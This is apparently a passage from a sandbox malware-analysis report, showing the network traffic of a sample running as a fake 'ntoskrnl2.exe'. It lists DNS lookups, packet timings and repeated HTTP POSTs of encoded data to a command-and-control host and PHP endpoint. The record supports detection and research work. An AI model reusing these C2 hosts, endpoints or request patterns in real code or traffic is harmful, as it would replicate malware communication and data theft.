                                                            Sep 2, 2024 13:35:40.266468048 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.268291950 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.268368006 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.269515991 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.274255037 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.618822098 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.618944883 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.624754906 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.624771118 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.624782085 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.920399904 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.920420885 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:40.993563890 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:40.993566036 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.049166918 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.053333044 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.102912903 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.102927923 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.162889957 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.162940979 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.163851023 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.168160915 CEST804987580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.168231010 CEST4987580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.168576956 CEST804987680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.168627024 CEST4987680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.170185089 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.170237064 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.170368910 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.177217007 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.524825096 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:41.584506989 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.844887018 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.966924906 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:41.967051029 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.103847027 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.103847027 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.108760118 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.109095097 CEST804987780.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.109200001 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.109200001 CEST4987780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.109360933 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.117547035 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.464344978 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:42.469253063 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.766242027 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.890738010 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:42.894380093 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.021466970 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.021467924 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.031483889 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.031563997 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.031779051 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.031892061 CEST804987880.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.032084942 CEST4987880192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.050283909 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.384490967 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.389369011 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.693470955 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.790448904 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.821547985 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.975646973 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.976268053 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.981197119 CEST804987980.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.981292009 CEST4987980192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.981374979 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:43.981441975 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.981528997 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:43.986284971 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:44.338293076 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:44.343334913 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:44.638926029 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:44.769257069 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:44.769435883 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:44.894640923 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:44.895453930 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.290424109 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.899821043 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.943972111 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:45.943989038 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:45.944000006 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:45.944091082 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.944224119 CEST804988080.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:45.944256067 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.944278002 CEST4988080192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.944703102 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:45.952299118 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.075561047 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.080638885 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.080770969 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.080957890 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.085735083 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.291327953 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.296268940 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.431241989 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.436551094 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.436764956 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.596846104 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.723119020 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.723227024 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.728918076 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.793389082 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.855777025 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.858948946 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.858948946 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:46.863748074 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.863997936 CEST804988180.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:46.864186049 CEST4988180192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.061305046 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.061549902 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.067045927 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.365511894 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.477931023 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.492717981 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.493535995 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.498651981 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.498779058 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.498845100 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.498966932 CEST804988280.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.499042988 CEST4988280192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.503698111 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:47.853002071 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:47.857902050 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.164413929 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.289160013 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.289303064 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.410298109 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.410628080 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.415419102 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.415491104 CEST804988380.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.415529966 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.415719986 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.417218924 CEST4988380192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.420494080 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:48.774874926 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:48.779805899 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.061068058 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.102981091 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.185448885 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.237402916 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.328351974 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.330028057 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.334372997 CEST804988480.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.334438086 CEST4988480192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.335406065 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.335463047 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.335589886 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.340357065 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.727447033 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:49.732527018 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:49.999872923 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.088329077 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.133835077 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.254156113 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.254970074 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.260015011 CEST804988580.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.260149002 CEST4988580192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.260185003 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.260335922 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.260335922 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.265140057 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.621217966 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:50.739290953 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.919668913 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:50.994293928 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.146625996 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:51.244808912 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.273242950 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.274152040 CEST4988780192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.278835058 CEST804988680.211.144.156192.168.2.6
                                                            Sep 2, 2024 13:35:51.278886080 CEST4988680192.168.2.680.211.144.156
                                                            Sep 2, 2024 13:35:51.278933048 CEST804988780.211.144.156192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 2, 2024 13:33:15.743927956 CEST | 56853 | 53 | 192.168.2.6 | 1.1.1.1
Sep 2, 2024 13:33:15.751626015 CEST | 53 | 56853 | 1.1.1.1 | 192.168.2.6
Sep 2, 2024 13:33:40.464283943 CEST | 64671 | 53 | 192.168.2.6 | 1.1.1.1
Sep 2, 2024 13:33:40.656140089 CEST | 53 | 64671 | 1.1.1.1 | 192.168.2.6

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 2, 2024 13:33:15.743927956 CEST | 192.168.2.6 | 1.1.1.1 | 0xb068 | Standard query (0) | keyauth.win | A (IP address) | IN (0x0001) | false
Sep 2, 2024 13:33:40.464283943 CEST | 192.168.2.6 | 1.1.1.1 | 0x6190 | Standard query (0) | 128538cm.n9shteam3.top | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 2, 2024 13:33:15.751626015 CEST | 1.1.1.1 | 192.168.2.6 | 0xb068 | No error (0) | keyauth.win | | 104.26.0.5 | A (IP address) | IN (0x0001) | false
Sep 2, 2024 13:33:15.751626015 CEST | 1.1.1.1 | 192.168.2.6 | 0xb068 | No error (0) | keyauth.win | | 104.26.1.5 | A (IP address) | IN (0x0001) | false
Sep 2, 2024 13:33:15.751626015 CEST | 1.1.1.1 | 192.168.2.6 | 0xb068 | No error (0) | keyauth.win | | 172.67.72.57 | A (IP address) | IN (0x0001) | false
Sep 2, 2024 13:33:40.656140089 CEST | 1.1.1.1 | 192.168.2.6 | 0x6190 | No error (0) | 128538cm.n9shteam3.top | | 80.211.144.156 | A (IP address) | IN (0x0001) | false

                                                            • 128538cm.n9shteam3.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49732 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:33:40.822514057 CEST | 345 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 344
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
Sep 2, 2024 13:33:41.181931019 CEST | 344 | OUT | [request body]
Sep 2, 2024 13:33:41.477550030 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:33:41.567852020 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:40 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 1380
                                                            Connection: keep-alive
Sep 2, 2024 13:33:41.567867041 CEST | 301 | IN | [response body, continued]
Sep 2, 2024 13:33:41.625276089 CEST | 321 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 380
                                                            Expect: 100-continue
Sep 2, 2024 13:33:41.830750942 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:33:41.830955982 CEST | 380 | OUT | [request body]
Sep 2, 2024 13:33:42.130362988 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:41 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
Sep 2, 2024 13:33:42.192636013 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
Sep 2, 2024 13:33:42.402674913 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:33:42.403249025 CEST | 1340 | OUT | [request body]
Sep 2, 2024 13:33:43.014805079 CEST | 308 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49733 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:33:41.828704119 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
Sep 2, 2024 13:33:42.181035042 CEST | 1028 | OUT | [request body]
Sep 2, 2024 13:33:42.497225046 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:33:42.687994003 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49734 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:33:42.866833925 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
Sep 2, 2024 13:33:43.212471008 CEST | 1028 | OUT | [request body]
Sep 2, 2024 13:33:43.483005047 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:33:43.611737967 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:42 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49735 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:33:43.745134115 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
Sep 2, 2024 13:33:44.102916956 CEST | 1028 | OUT | [request body]
Sep 2, 2024 13:33:44.388576031 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:33:44.513240099 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:43 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49736 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:33:44.681550026 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
Sep 2, 2024 13:33:45.040632963 CEST | 1028 | OUT | [request body]
Sep 2, 2024 13:33:45.332659960 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:33:45.457918882 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
Sep 2, 2024 13:33:45.782109976 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:44 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49740 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:33:45.787583113 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
Sep 2, 2024 13:33:46.134427071 CEST | 1028 | OUT | [request body]
Sep 2, 2024 13:33:46.455176115 CEST | 25 | IN | HTTP/1.1 100 Continue
Sep 2, 2024 13:33:46.589682102 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:45 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.6 | 49741 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
Timestamp | Bytes transferred | Direction | Data
Sep 2, 2024 13:33:46.722269058 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:47.082544088 CEST1028OUTData Raw: 50 52 5a 52 5e 47 5c 56 5b 5f 56 5a 57 5e 50 52 55 51 5e 47 50 52 5a 5d 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PRZR^G\V[_VZW^PRUQ^GPRZ]YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'$"-<8830-(/-4 Z0**( )+>"^/*%^./]+$
                                                            Sep 2, 2024 13:33:47.393899918 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:33:47.526725054 CEST | 158 | IN | HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:33:46 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.6 | 49742 | 80.211.144.156 | 80 | 7552 | C:\Windows\System32\ntoskrnl2.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Sep 2, 2024 13:33:47.913032055 CEST | 322 | OUT | POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:33:48.259388924 CEST | 1028 | OUT | Data Raw: 55 55 5a 56 5e 49 59 51 5b 5f 56 5a 57 5f 50 5d 55 5f 5e 42 50 5e 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
